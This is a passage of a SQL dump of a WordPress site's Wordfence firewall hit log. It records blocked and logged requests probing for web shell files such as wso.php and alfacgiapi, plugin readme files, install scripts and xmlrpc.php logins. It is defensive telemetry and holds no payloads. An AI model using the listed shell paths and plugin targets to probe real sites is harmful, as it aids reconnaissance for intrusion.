(50912, 1712082560.381279, 1712082559.622300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(52065, 1712762174.695051, 1712762174.275900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
(51506, 0.000000, 1712320889.406367, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾mI', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51507, 0.000000, 1712320892.325501, '\0\0\0\0\0\0\0\0\0\0ÿÿoß¼0', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51508, 0.000000, 1712320892.229442, '\0\0\0\0\0\0\0\0\0\0ÿÿ)Økr', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51897, 1712625156.391705, 1712625153.945800, '\0\0\0\0\0\0\0\0\0\0ÿÿ#Ñ6', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/woocommerce/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; rb.gy/oupwis; a98ce8ee39) Chrome/84.0.4147.105 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51902, 1712637053.088599, 1712637052.756100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(51906, 1712636974.698687, 1712636974.315400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/mail.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21haWwucGhw","category":"brute-force","ssl":1}'),
(51875, 1712562415.563852, 1712562412.807900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;$', 0, 403, 0, 0, 0, 'https://happythinking.com/alfacgiapi/perl.alfa', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFjZ2lhcGkvcGVybC5hbGZh","category":"brute-force","ssl":1}'),
(51903, 1712637016.380703, 1712637016.067100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(51883, 1712582156.228031, 1712582155.883300, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/site/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(50683, 1711785285.931716, 1711785285.063000, '\0\0\0\0\0\0\0\0\0\0ÿÿ­ù4z', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51916, 1712636813.531205, 1712636813.248800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wso.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzby5waHA=","category":"brute-force","ssl":1}'),
(51914, 1712636839.901135, 1712636839.435500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/network.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L25ldHdvcmsucGhw","category":"brute-force","ssl":1}'),
(51889, 1712582135.054840, 1712582134.297100, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/wordpress/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L3dvcmRwcmVzcy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51751, 1712368256.131109, 1712368255.747900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wpshop/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A546B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHNob3AvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHNob3AvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51720, 1712368115.055291, 1712368114.664600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/quiz-master-next/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2; rv:58.0.1) Gecko/20100101 Firefox/58.0.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9xdWl6LW1hc3Rlci1uZXh0L3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9xdWl6LW1hc3Rlci1uZXh0L3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(50657, 1711731900.731675, 1711731900.344900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/dropdown.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vZHJvcGRvd24ucGhw","category":"brute-force","ssl":1}'),
(50719, 1711858482.121326, 1711858480.424300, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çöª', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins/content/apismtp/apismtp.php?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw","category":"brute-force","ssl":1}'),
(51721, 1712368132.679329, 1712368132.387600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/woocommerce-product-addon/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 14; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wcm9kdWN0LWFkZG9uL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b29jb21tZXJjZS1wcm9kdWN0LWFkZG9uL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51884, 1712582153.750051, 1712582152.769100, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çxî', 0, 403, 0, 0, 0, 'https://happythinking.com/backup/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51880, 0.000000, 1712564642.610183, '\0\0\0\0\0\0\0\0\0\0ÿÿÔ<H"', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51881, 0.000000, 1712569316.554811, '\0\0\0\0\0\0\0\0\0\0ÿÿš ?', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51876, 1712562413.447973, 1712562411.433900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;$', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=","category":"brute-force","ssl":1}'),
(52002, 1712689949.161055, 1712689948.714500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/autoload_classmap.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F1dG9sb2FkX2NsYXNzbWFwLnBocA==","category":"brute-force","ssl":1}'),
(51910, 1712636915.843221, 1712636915.443900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(52001, 1712689954.028189, 1712689953.551500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/text.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RleHQucGhw","category":"brute-force","ssl":1}'),
(52051, 1712761837.550028, 1712761837.223500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/b0x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2IweC5waHA=","category":"brute-force","ssl":1}'),
(52052, 1712761818.434090, 1712761818.085100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3gucGhw","category":"brute-force","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(51612, 1712359389.080577, 1712359388.679600, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(51589, 1712338979.657807, 1712338979.232200, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(51613, 1712359386.976110, 1712359386.532000, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(51628, 1712367537.389116, 1712367537.010300, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-agora-io/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/107.2 Mobile/15E148 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1hZ29yYS1pby9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1hZ29yYS1pby9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51637, 1712367542.117030, 1712367541.780400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/backup-backup/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; HD1913) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 EdgA/120.0.2210.157', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
